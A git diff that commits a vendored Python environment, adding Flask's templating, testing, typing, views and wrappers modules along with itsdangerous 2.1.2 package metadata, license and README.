how Flask's blueprint works so that it can prepend the + name of the blueprint to referenced templates if necessary. + """ + + def __init__(self, app: App, **options: t.Any) -> None: + if "loader" not in options: + options["loader"] = app.create_global_jinja_loader() + BaseEnvironment.__init__(self, **options) + self.app = app + + +class DispatchingJinjaLoader(BaseLoader): + """A loader that looks for templates in the application and all + the blueprint folders. 
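The ``flask/signals.py`` hunk above only declares the signals; connecting to one goes through blinker. A minimal sketch (the receiver name is illustrative; blinker holds receivers weakly by default, so keep a module-level reference to the handler):

    from flask import Flask, template_rendered

    app = Flask(__name__)

    def log_render(sender, template, context, **extra):
        # Receives the app as sender plus the keyword arguments sent by Flask.
        print("rendered", template.name, "with", sorted(context))

    template_rendered.connect(log_render, app)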
+ """ + + def __init__(self, app: App) -> None: + self.app = app + + def get_source( # type: ignore + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + if self.app.config["EXPLAIN_TEMPLATE_LOADING"]: + return self._get_source_explained(environment, template) + return self._get_source_fast(environment, template) + + def _get_source_explained( + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + attempts = [] + rv: tuple[str, str | None, t.Callable[[], bool] | None] | None + trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None + + for srcobj, loader in self._iter_loaders(template): + try: + rv = loader.get_source(environment, template) + if trv is None: + trv = rv + except TemplateNotFound: + rv = None + attempts.append((loader, srcobj, rv)) + + from .debughelpers import explain_template_loading_attempts + + explain_template_loading_attempts(self.app, template, attempts) + + if trv is not None: + return trv + raise TemplateNotFound(template) + + def _get_source_fast( + self, environment: Environment, template: str + ) -> tuple[str, str | None, t.Callable | None]: + for _srcobj, loader in self._iter_loaders(template): + try: + return loader.get_source(environment, template) + except TemplateNotFound: + continue + raise TemplateNotFound(template) + + def _iter_loaders( + self, template: str + ) -> t.Generator[tuple[Scaffold, BaseLoader], None, None]: + loader = self.app.jinja_loader + if loader is not None: + yield self.app, loader + + for blueprint in self.app.iter_blueprints(): + loader = blueprint.jinja_loader + if loader is not None: + yield blueprint, loader + + def list_templates(self) -> list[str]: + result = set() + loader = self.app.jinja_loader + if loader is not None: + result.update(loader.list_templates()) + + for blueprint in self.app.iter_blueprints(): + loader = blueprint.jinja_loader + if loader is not None: + for template in loader.list_templates(): + result.add(template) + + return list(result) + + +def _render(app: Flask, template: Template, context: dict[str, t.Any]) -> str: + app.update_template_context(context) + before_render_template.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + rv = template.render(context) + template_rendered.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + return rv + + +def render_template( + template_name_or_list: str | Template | list[str | Template], + **context: t.Any, +) -> str: + """Render a template by name with the given context. + + :param template_name_or_list: The name of the template to render. If + a list is given, the first name to exist will be rendered. + :param context: The variables to make available in the template. + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.get_or_select_template(template_name_or_list) + return _render(app, template, context) + + +def render_template_string(source: str, **context: t.Any) -> str: + """Render a template from the given source string with the given + context. + + :param source: The source code of the template to render. + :param context: The variables to make available in the template. 
+ """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.from_string(source) + return _render(app, template, context) + + +def _stream( + app: Flask, template: Template, context: dict[str, t.Any] +) -> t.Iterator[str]: + app.update_template_context(context) + before_render_template.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + + def generate() -> t.Iterator[str]: + yield from template.generate(context) + template_rendered.send( + app, _async_wrapper=app.ensure_sync, template=template, context=context + ) + + rv = generate() + + # If a request context is active, keep it while generating. + if request: + rv = stream_with_context(rv) + + return rv + + +def stream_template( + template_name_or_list: str | Template | list[str | Template], + **context: t.Any, +) -> t.Iterator[str]: + """Render a template by name with the given context as a stream. + This returns an iterator of strings, which can be used as a + streaming response from a view. + + :param template_name_or_list: The name of the template to render. If + a list is given, the first name to exist will be rendered. + :param context: The variables to make available in the template. + + .. versionadded:: 2.2 + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.get_or_select_template(template_name_or_list) + return _stream(app, template, context) + + +def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]: + """Render a template from the given source string with the given + context as a stream. This returns an iterator of strings, which can + be used as a streaming response from a view. + + :param source: The source code of the template to render. + :param context: The variables to make available in the template. + + .. versionadded:: 2.2 + """ + app = current_app._get_current_object() # type: ignore[attr-defined] + template = app.jinja_env.from_string(source) + return _stream(app, template, context) diff --git a/env/Lib/site-packages/flask/testing.py b/env/Lib/site-packages/flask/testing.py new file mode 100644 index 00000000..69aa7851 --- /dev/null +++ b/env/Lib/site-packages/flask/testing.py @@ -0,0 +1,295 @@ +from __future__ import annotations + +import importlib.metadata +import typing as t +from contextlib import contextmanager +from contextlib import ExitStack +from copy import copy +from types import TracebackType +from urllib.parse import urlsplit + +import werkzeug.test +from click.testing import CliRunner +from werkzeug.test import Client +from werkzeug.wrappers import Request as BaseRequest + +from .cli import ScriptInfo +from .sessions import SessionMixin + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.test import TestResponse + + from .app import Flask + + +class EnvironBuilder(werkzeug.test.EnvironBuilder): + """An :class:`~werkzeug.test.EnvironBuilder`, that takes defaults from the + application. + + :param app: The Flask application to configure the environment from. + :param path: URL path being requested. + :param base_url: Base URL where the app is being served, which + ``path`` is relative to. If not given, built from + :data:`PREFERRED_URL_SCHEME`, ``subdomain``, + :data:`SERVER_NAME`, and :data:`APPLICATION_ROOT`. + :param subdomain: Subdomain name to append to :data:`SERVER_NAME`. + :param url_scheme: Scheme to use instead of + :data:`PREFERRED_URL_SCHEME`. + :param json: If given, this is serialized as JSON and passed as + ``data``. 
Also defaults ``content_type`` to + ``application/json``. + :param args: other positional arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + :param kwargs: other keyword arguments passed to + :class:`~werkzeug.test.EnvironBuilder`. + """ + + def __init__( + self, + app: Flask, + path: str = "/", + base_url: str | None = None, + subdomain: str | None = None, + url_scheme: str | None = None, + *args: t.Any, + **kwargs: t.Any, + ) -> None: + assert not (base_url or subdomain or url_scheme) or ( + base_url is not None + ) != bool( + subdomain or url_scheme + ), 'Cannot pass "subdomain" or "url_scheme" with "base_url".' + + if base_url is None: + http_host = app.config.get("SERVER_NAME") or "localhost" + app_root = app.config["APPLICATION_ROOT"] + + if subdomain: + http_host = f"{subdomain}.{http_host}" + + if url_scheme is None: + url_scheme = app.config["PREFERRED_URL_SCHEME"] + + url = urlsplit(path) + base_url = ( + f"{url.scheme or url_scheme}://{url.netloc or http_host}" + f"/{app_root.lstrip('/')}" + ) + path = url.path + + if url.query: + sep = b"?" if isinstance(url.query, bytes) else "?" + path += sep + url.query + + self.app = app + super().__init__(path, base_url, *args, **kwargs) + + def json_dumps(self, obj: t.Any, **kwargs: t.Any) -> str: # type: ignore + """Serialize ``obj`` to a JSON-formatted string. + + The serialization will be configured according to the config associated + with this EnvironBuilder's ``app``. + """ + return self.app.json.dumps(obj, **kwargs) + + +_werkzeug_version = "" + + +def _get_werkzeug_version() -> str: + global _werkzeug_version + + if not _werkzeug_version: + _werkzeug_version = importlib.metadata.version("werkzeug") + + return _werkzeug_version + + +class FlaskClient(Client): + """Works like a regular Werkzeug test client but has knowledge about + Flask's contexts to defer the cleanup of the request context until + the end of a ``with`` block. For general information about how to + use this class refer to :class:`werkzeug.test.Client`. + + .. versionchanged:: 0.12 + `app.test_client()` includes preset default environment, which can be + set after instantiation of the `app.test_client()` object in + `client.environ_base`. + + Basic usage is outlined in the :doc:`/testing` chapter. + """ + + application: Flask + + def __init__(self, *args: t.Any, **kwargs: t.Any) -> None: + super().__init__(*args, **kwargs) + self.preserve_context = False + self._new_contexts: list[t.ContextManager[t.Any]] = [] + self._context_stack = ExitStack() + self.environ_base = { + "REMOTE_ADDR": "127.0.0.1", + "HTTP_USER_AGENT": f"Werkzeug/{_get_werkzeug_version()}", + } + + @contextmanager + def session_transaction( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Generator[SessionMixin, None, None]: + """When used in combination with a ``with`` statement this opens a + session transaction. This can be used to modify the session that + the test client uses. Once the ``with`` block is left the session is + stored back. + + :: + + with client.session_transaction() as session: + session['value'] = 42 + + Internally this is implemented by going through a temporary test + request context and since session handling could depend on + request variables this function accepts the same arguments as + :meth:`~flask.Flask.test_request_context` which are directly + passed through. + """ + if self._cookies is None: + raise TypeError( + "Cookies are disabled. Create a client with 'use_cookies=True'." 
+ ) + + app = self.application + ctx = app.test_request_context(*args, **kwargs) + self._add_cookies_to_wsgi(ctx.request.environ) + + with ctx: + sess = app.session_interface.open_session(app, ctx.request) + + if sess is None: + raise RuntimeError("Session backend did not open a session.") + + yield sess + resp = app.response_class() + + if app.session_interface.is_null_session(sess): + return + + with ctx: + app.session_interface.save_session(app, sess, resp) + + self._update_cookies_from_response( + ctx.request.host.partition(":")[0], + ctx.request.path, + resp.headers.getlist("Set-Cookie"), + ) + + def _copy_environ(self, other): + out = {**self.environ_base, **other} + + if self.preserve_context: + out["werkzeug.debug.preserve_context"] = self._new_contexts.append + + return out + + def _request_from_builder_args(self, args, kwargs): + kwargs["environ_base"] = self._copy_environ(kwargs.get("environ_base", {})) + builder = EnvironBuilder(self.application, *args, **kwargs) + + try: + return builder.get_request() + finally: + builder.close() + + def open( + self, + *args: t.Any, + buffered: bool = False, + follow_redirects: bool = False, + **kwargs: t.Any, + ) -> TestResponse: + if args and isinstance( + args[0], (werkzeug.test.EnvironBuilder, dict, BaseRequest) + ): + if isinstance(args[0], werkzeug.test.EnvironBuilder): + builder = copy(args[0]) + builder.environ_base = self._copy_environ(builder.environ_base or {}) + request = builder.get_request() + elif isinstance(args[0], dict): + request = EnvironBuilder.from_environ( + args[0], app=self.application, environ_base=self._copy_environ({}) + ).get_request() + else: + # isinstance(args[0], BaseRequest) + request = copy(args[0]) + request.environ = self._copy_environ(request.environ) + else: + # request is None + request = self._request_from_builder_args(args, kwargs) + + # Pop any previously preserved contexts. This prevents contexts + # from being preserved across redirects or multiple requests + # within a single block. + self._context_stack.close() + + response = super().open( + request, + buffered=buffered, + follow_redirects=follow_redirects, + ) + response.json_module = self.application.json # type: ignore[assignment] + + # Re-push contexts that were preserved during the request. + while self._new_contexts: + cm = self._new_contexts.pop() + self._context_stack.enter_context(cm) + + return response + + def __enter__(self) -> FlaskClient: + if self.preserve_context: + raise RuntimeError("Cannot nest client invocations") + self.preserve_context = True + return self + + def __exit__( + self, + exc_type: type | None, + exc_value: BaseException | None, + tb: TracebackType | None, + ) -> None: + self.preserve_context = False + self._context_stack.close() + + +class FlaskCliRunner(CliRunner): + """A :class:`~click.testing.CliRunner` for testing a Flask app's + CLI commands. Typically created using + :meth:`~flask.Flask.test_cli_runner`. See :ref:`testing-cli`. + """ + + def __init__(self, app: Flask, **kwargs: t.Any) -> None: + self.app = app + super().__init__(**kwargs) + + def invoke( # type: ignore + self, cli: t.Any = None, args: t.Any = None, **kwargs: t.Any + ) -> t.Any: + """Invokes a CLI command in an isolated environment. See + :meth:`CliRunner.invoke ` for + full method documentation. See :ref:`testing-cli` for examples. + + If the ``obj`` argument is not given, passes an instance of + :class:`~flask.cli.ScriptInfo` that knows how to load the Flask + app being tested. + + :param cli: Command object to invoke. 
Default is the app's + :attr:`~flask.app.Flask.cli` group. + :param args: List of strings to invoke the command with. + + :return: a :class:`~click.testing.Result` object. + """ + if cli is None: + cli = self.app.cli # type: ignore + + if "obj" not in kwargs: + kwargs["obj"] = ScriptInfo(create_app=lambda: self.app) + + return super().invoke(cli, args, **kwargs) diff --git a/env/Lib/site-packages/flask/typing.py b/env/Lib/site-packages/flask/typing.py new file mode 100644 index 00000000..a8c9ba04 --- /dev/null +++ b/env/Lib/site-packages/flask/typing.py @@ -0,0 +1,88 @@ +from __future__ import annotations + +import typing as t + +if t.TYPE_CHECKING: # pragma: no cover + from _typeshed.wsgi import WSGIApplication # noqa: F401 + from werkzeug.datastructures import Headers # noqa: F401 + from werkzeug.sansio.response import Response # noqa: F401 + +# The possible types that are directly convertible or are a Response object. +ResponseValue = t.Union[ + "Response", + str, + bytes, + t.List[t.Any], + # Only dict is actually accepted, but Mapping allows for TypedDict. + t.Mapping[str, t.Any], + t.Iterator[str], + t.Iterator[bytes], +] + +# the possible types for an individual HTTP header +# This should be a Union, but mypy doesn't pass unless it's a TypeVar. +HeaderValue = t.Union[str, t.List[str], t.Tuple[str, ...]] + +# the possible types for HTTP headers +HeadersValue = t.Union[ + "Headers", + t.Mapping[str, HeaderValue], + t.Sequence[t.Tuple[str, HeaderValue]], +] + +# The possible types returned by a route function. +ResponseReturnValue = t.Union[ + ResponseValue, + t.Tuple[ResponseValue, HeadersValue], + t.Tuple[ResponseValue, int], + t.Tuple[ResponseValue, int, HeadersValue], + "WSGIApplication", +] + +# Allow any subclass of werkzeug.Response, such as the one from Flask, +# as a callback argument. Using werkzeug.Response directly makes a +# callback annotated with flask.Response fail type checking. +ResponseClass = t.TypeVar("ResponseClass", bound="Response") + +AppOrBlueprintKey = t.Optional[str] # The App key is None, whereas blueprints are named +AfterRequestCallable = t.Union[ + t.Callable[[ResponseClass], ResponseClass], + t.Callable[[ResponseClass], t.Awaitable[ResponseClass]], +] +BeforeFirstRequestCallable = t.Union[ + t.Callable[[], None], t.Callable[[], t.Awaitable[None]] +] +BeforeRequestCallable = t.Union[ + t.Callable[[], t.Optional[ResponseReturnValue]], + t.Callable[[], t.Awaitable[t.Optional[ResponseReturnValue]]], +] +ShellContextProcessorCallable = t.Callable[[], t.Dict[str, t.Any]] +TeardownCallable = t.Union[ + t.Callable[[t.Optional[BaseException]], None], + t.Callable[[t.Optional[BaseException]], t.Awaitable[None]], +] +TemplateContextProcessorCallable = t.Union[ + t.Callable[[], t.Dict[str, t.Any]], + t.Callable[[], t.Awaitable[t.Dict[str, t.Any]]], +] +TemplateFilterCallable = t.Callable[..., t.Any] +TemplateGlobalCallable = t.Callable[..., t.Any] +TemplateTestCallable = t.Callable[..., bool] +URLDefaultCallable = t.Callable[[str, dict], None] +URLValuePreprocessorCallable = t.Callable[[t.Optional[str], t.Optional[dict]], None] + +# This should take Exception, but that either breaks typing the argument +# with a specific exception, or decorating multiple times with different +# exceptions (and using a union type on the argument). 
+# https://github.com/pallets/flask/issues/4095 +# https://github.com/pallets/flask/issues/4295 +# https://github.com/pallets/flask/issues/4297 +ErrorHandlerCallable = t.Union[ + t.Callable[[t.Any], ResponseReturnValue], + t.Callable[[t.Any], t.Awaitable[ResponseReturnValue]], +] + +RouteCallable = t.Union[ + t.Callable[..., ResponseReturnValue], + t.Callable[..., t.Awaitable[ResponseReturnValue]], +] diff --git a/env/Lib/site-packages/flask/views.py b/env/Lib/site-packages/flask/views.py new file mode 100644 index 00000000..c7a2b621 --- /dev/null +++ b/env/Lib/site-packages/flask/views.py @@ -0,0 +1,190 @@ +from __future__ import annotations + +import typing as t + +from . import typing as ft +from .globals import current_app +from .globals import request + + +http_method_funcs = frozenset( + ["get", "post", "head", "options", "delete", "put", "trace", "patch"] +) + + +class View: + """Subclass this class and override :meth:`dispatch_request` to + create a generic class-based view. Call :meth:`as_view` to create a + view function that creates an instance of the class with the given + arguments and calls its ``dispatch_request`` method with any URL + variables. + + See :doc:`views` for a detailed guide. + + .. code-block:: python + + class Hello(View): + init_every_request = False + + def dispatch_request(self, name): + return f"Hello, {name}!" + + app.add_url_rule( + "/hello/", view_func=Hello.as_view("hello") + ) + + Set :attr:`methods` on the class to change what methods the view + accepts. + + Set :attr:`decorators` on the class to apply a list of decorators to + the generated view function. Decorators applied to the class itself + will not be applied to the generated view function! + + Set :attr:`init_every_request` to ``False`` for efficiency, unless + you need to store request-global data on ``self``. + """ + + #: The methods this view is registered for. Uses the same default + #: (``["GET", "HEAD", "OPTIONS"]``) as ``route`` and + #: ``add_url_rule`` by default. + methods: t.ClassVar[t.Collection[str] | None] = None + + #: Control whether the ``OPTIONS`` method is handled automatically. + #: Uses the same default (``True``) as ``route`` and + #: ``add_url_rule`` by default. + provide_automatic_options: t.ClassVar[bool | None] = None + + #: A list of decorators to apply, in order, to the generated view + #: function. Remember that ``@decorator`` syntax is applied bottom + #: to top, so the first decorator in the list would be the bottom + #: decorator. + #: + #: .. versionadded:: 0.8 + decorators: t.ClassVar[list[t.Callable]] = [] + + #: Create a new instance of this view class for every request by + #: default. If a view subclass sets this to ``False``, the same + #: instance is used for every request. + #: + #: A single instance is more efficient, especially if complex setup + #: is done during init. However, storing data on ``self`` is no + #: longer safe across requests, and :data:`~flask.g` should be used + #: instead. + #: + #: .. versionadded:: 2.2 + init_every_request: t.ClassVar[bool] = True + + def dispatch_request(self) -> ft.ResponseReturnValue: + """The actual view function behavior. Subclasses must override + this and return a valid response. Any variables from the URL + rule are passed as keyword arguments. + """ + raise NotImplementedError() + + @classmethod + def as_view( + cls, name: str, *class_args: t.Any, **class_kwargs: t.Any + ) -> ft.RouteCallable: + """Convert the class into a view function that can be registered + for a route. 
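
A usage sketch for ``View.as_view`` as documented above (class, route, and argument names are illustrative):

.. code-block:: python

    from flask import Flask
    from flask.views import View

    app = Flask(__name__)

    class Greeting(View):
        methods = ["GET"]

        def __init__(self, greeting):
            self.greeting = greeting

        def dispatch_request(self, name):
            return f"{self.greeting}, {name}!"

    # Arguments after the name are forwarded to Greeting.__init__ on each
    # request, because init_every_request defaults to True.
    app.add_url_rule("/greet/<name>", view_func=Greeting.as_view("greet", "Hello"))
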
+ + By default, the generated view will create a new instance of the + view class for every request and call its + :meth:`dispatch_request` method. If the view class sets + :attr:`init_every_request` to ``False``, the same instance will + be used for every request. + + Except for ``name``, all other arguments passed to this method + are forwarded to the view class ``__init__`` method. + + .. versionchanged:: 2.2 + Added the ``init_every_request`` class attribute. + """ + if cls.init_every_request: + + def view(**kwargs: t.Any) -> ft.ResponseReturnValue: + self = view.view_class( # type: ignore[attr-defined] + *class_args, **class_kwargs + ) + return current_app.ensure_sync(self.dispatch_request)(**kwargs) + + else: + self = cls(*class_args, **class_kwargs) + + def view(**kwargs: t.Any) -> ft.ResponseReturnValue: + return current_app.ensure_sync(self.dispatch_request)(**kwargs) + + if cls.decorators: + view.__name__ = name + view.__module__ = cls.__module__ + for decorator in cls.decorators: + view = decorator(view) + + # We attach the view class to the view function for two reasons: + # first of all it allows us to easily figure out what class-based + # view this thing came from, secondly it's also used for instantiating + # the view class so you can actually replace it with something else + # for testing purposes and debugging. + view.view_class = cls # type: ignore + view.__name__ = name + view.__doc__ = cls.__doc__ + view.__module__ = cls.__module__ + view.methods = cls.methods # type: ignore + view.provide_automatic_options = cls.provide_automatic_options # type: ignore + return view + + +class MethodView(View): + """Dispatches request methods to the corresponding instance methods. + For example, if you implement a ``get`` method, it will be used to + handle ``GET`` requests. + + This can be useful for defining a REST API. + + :attr:`methods` is automatically set based on the methods defined on + the class. + + See :doc:`views` for a detailed guide. + + .. code-block:: python + + class CounterAPI(MethodView): + def get(self): + return str(session.get("counter", 0)) + + def post(self): + session["counter"] = session.get("counter", 0) + 1 + return redirect(url_for("counter")) + + app.add_url_rule( + "/counter", view_func=CounterAPI.as_view("counter") + ) + """ + + def __init_subclass__(cls, **kwargs: t.Any) -> None: + super().__init_subclass__(**kwargs) + + if "methods" not in cls.__dict__: + methods = set() + + for base in cls.__bases__: + if getattr(base, "methods", None): + methods.update(base.methods) # type: ignore[attr-defined] + + for key in http_method_funcs: + if hasattr(cls, key): + methods.add(key.upper()) + + if methods: + cls.methods = methods + + def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue: + meth = getattr(self, request.method.lower(), None) + + # If the request method is HEAD and we don't have a handler for it + # retry with GET. 
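
A usage sketch for ``MethodView`` showing the automatic ``methods`` detection described above (class and endpoint names are illustrative):

.. code-block:: python

    from flask import Flask
    from flask.views import MethodView

    app = Flask(__name__)

    class ItemAPI(MethodView):
        # __init_subclass__ fills methods automatically: {"GET", "DELETE"} here.
        def get(self, item_id):
            return {"id": item_id}

        def delete(self, item_id):
            return "", 204

    app.add_url_rule("/items/<int:item_id>", view_func=ItemAPI.as_view("item"))
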
+ if meth is None and request.method == "HEAD": + meth = getattr(self, "get", None) + + assert meth is not None, f"Unimplemented method {request.method!r}" + return current_app.ensure_sync(meth)(**kwargs) diff --git a/env/Lib/site-packages/flask/wrappers.py b/env/Lib/site-packages/flask/wrappers.py new file mode 100644 index 00000000..ef7aa38c --- /dev/null +++ b/env/Lib/site-packages/flask/wrappers.py @@ -0,0 +1,173 @@ +from __future__ import annotations + +import typing as t + +from werkzeug.exceptions import BadRequest +from werkzeug.wrappers import Request as RequestBase +from werkzeug.wrappers import Response as ResponseBase + +from . import json +from .globals import current_app +from .helpers import _split_blueprint_path + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.routing import Rule + + +class Request(RequestBase): + """The request object used by default in Flask. Remembers the + matched endpoint and view arguments. + + It is what ends up as :class:`~flask.request`. If you want to replace + the request object used you can subclass this and set + :attr:`~flask.Flask.request_class` to your subclass. + + The request object is a :class:`~werkzeug.wrappers.Request` subclass and + provides all of the attributes Werkzeug defines plus a few Flask + specific ones. + """ + + json_module: t.Any = json + + #: The internal URL rule that matched the request. This can be + #: useful to inspect which methods are allowed for the URL from + #: a before/after handler (``request.url_rule.methods``) etc. + #: Though if the request's method was invalid for the URL rule, + #: the valid list is available in ``routing_exception.valid_methods`` + #: instead (an attribute of the Werkzeug exception + #: :exc:`~werkzeug.exceptions.MethodNotAllowed`) + #: because the request was never internally bound. + #: + #: .. versionadded:: 0.6 + url_rule: Rule | None = None + + #: A dict of view arguments that matched the request. If an exception + #: happened when matching, this will be ``None``. + view_args: dict[str, t.Any] | None = None + + #: If matching the URL failed, this is the exception that will be + #: raised / was raised as part of the request handling. This is + #: usually a :exc:`~werkzeug.exceptions.NotFound` exception or + #: something similar. + routing_exception: Exception | None = None + + @property + def max_content_length(self) -> int | None: # type: ignore + """Read-only view of the ``MAX_CONTENT_LENGTH`` config key.""" + if current_app: + return current_app.config["MAX_CONTENT_LENGTH"] + else: + return None + + @property + def endpoint(self) -> str | None: + """The endpoint that matched the request URL. + + This will be ``None`` if matching failed or has not been + performed yet. + + This in combination with :attr:`view_args` can be used to + reconstruct the same URL or a modified URL. + """ + if self.url_rule is not None: + return self.url_rule.endpoint + + return None + + @property + def blueprint(self) -> str | None: + """The registered name of the current blueprint. + + This will be ``None`` if the endpoint is not part of a + blueprint, or if URL matching failed or has not been performed + yet. + + This does not necessarily match the name the blueprint was + created with. It may have been nested, or registered with a + different name. + """ + endpoint = self.endpoint + + if endpoint is not None and "." 
in endpoint: + return endpoint.rpartition(".")[0] + + return None + + @property + def blueprints(self) -> list[str]: + """The registered names of the current blueprint upwards through + parent blueprints. + + This will be an empty list if there is no current blueprint, or + if URL matching failed. + + .. versionadded:: 2.0.1 + """ + name = self.blueprint + + if name is None: + return [] + + return _split_blueprint_path(name) + + def _load_form_data(self) -> None: + super()._load_form_data() + + # In debug mode we're replacing the files multidict with an ad-hoc + # subclass that raises a different error for key errors. + if ( + current_app + and current_app.debug + and self.mimetype != "multipart/form-data" + and not self.files + ): + from .debughelpers import attach_enctype_error_multidict + + attach_enctype_error_multidict(self) + + def on_json_loading_failed(self, e: ValueError | None) -> t.Any: + try: + return super().on_json_loading_failed(e) + except BadRequest as e: + if current_app and current_app.debug: + raise + + raise BadRequest() from e + + +class Response(ResponseBase): + """The response object that is used by default in Flask. Works like the + response object from Werkzeug but is set to have an HTML mimetype by + default. Quite often you don't have to create this object yourself because + :meth:`~flask.Flask.make_response` will take care of that for you. + + If you want to replace the response object used you can subclass this and + set :attr:`~flask.Flask.response_class` to your subclass. + + .. versionchanged:: 1.0 + JSON support is added to the response, like the request. This is useful + when testing to get the test client response data as JSON. + + .. versionchanged:: 1.0 + + Added :attr:`max_cookie_size`. + """ + + default_mimetype: str | None = "text/html" + + json_module = json + + autocorrect_location_header = False + + @property + def max_cookie_size(self) -> int: # type: ignore + """Read-only view of the :data:`MAX_COOKIE_SIZE` config key. + + See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in + Werkzeug's docs. + """ + if current_app: + return current_app.config["MAX_COOKIE_SIZE"] + + # return Werkzeug's default when not in an app context + return super().max_cookie_size diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst new file mode 100644 index 00000000..7b190ca6 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2011 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA new file mode 100644 index 00000000..1d935ed3 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA @@ -0,0 +1,97 @@ +Metadata-Version: 2.1 +Name: itsdangerous +Version: 2.1.2 +Summary: Safely pass data to untrusted environments and back. +Home-page: https://palletsprojects.com/p/itsdangerous/ +Author: Armin Ronacher +Author-email: armin.ronacher@active-4.com +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://itsdangerous.palletsprojects.com/ +Project-URL: Changes, https://itsdangerous.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/itsdangerous/ +Project-URL: Issue Tracker, https://github.com/pallets/itsdangerous/issues/ +Project-URL: Twitter, https://twitter.com/PalletsTeam +Project-URL: Chat, https://discord.gg/pallets +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst + +ItsDangerous +============ + +... so better sign this + +Various helpers to pass data to untrusted environments and to get it +back safe and sound. Data is cryptographically signed to ensure that a +token has not been tampered with. + +It's possible to customize how data is serialized. Data is compressed as +needed. A timestamp can be added and verified automatically while +loading a token. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + pip install -U itsdangerous + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +Here's how you could generate a token for transmitting a user's id and +name between web requests. + +.. code-block:: python + + from itsdangerous import URLSafeSerializer + auth_s = URLSafeSerializer("secret key", "auth") + token = auth_s.dumps({"id": 5, "name": "itsdangerous"}) + + print(token) + # eyJpZCI6NSwibmFtZSI6Iml0c2Rhbmdlcm91cyJ9.6YP6T0BaO67XP--9UzTrmurXSmg + + data = auth_s.loads(token) + print(data["name"]) + # itsdangerous + + +Donate +------ + +The Pallets organization develops and supports ItsDangerous and other +popular packages. In order to grow the community of contributors and +users, and allow the maintainers to devote more time to the projects, +`please donate today`_. + +.. 
